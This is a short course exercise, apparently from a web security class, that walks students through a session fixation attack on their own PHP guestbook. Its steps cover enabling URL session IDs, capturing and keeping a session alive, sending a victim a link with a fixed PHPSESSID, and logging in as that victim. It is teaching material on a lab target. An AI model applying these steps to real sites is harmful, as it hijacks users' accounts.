Exercise: Authentication and Session Management

Implement a Session Fixation Attack on your guestbook

  • Before starting this exercise, verify that your server accepts sessionID's also in the URL, verify that you have the following configuration in your php.ini file:
    session.use_only_cookies = 0
    This is the default value and offers the possibility for this attack.
  • Write a program that connects to the page of your guestbook and stores the Session ID. (you can also do it directly using a telnet and noting the Session ID).
  • Write another program keeping your session alive. (sends regularly requests containing the session ID to the server).
    Your program should send an alert when the user has been logged-in (for doing this, you have to look at a sentence that does not appear in the guestbook page normally).
  • Send a link to a browser containing the url of the guestbook and a SessionID (?PHPSESSID=1234). The user will log
  • Remove the session ID inside your own browser. Start the guestbook with the same URL (containing the same SessionID): Ta da! You are logged in as your victim.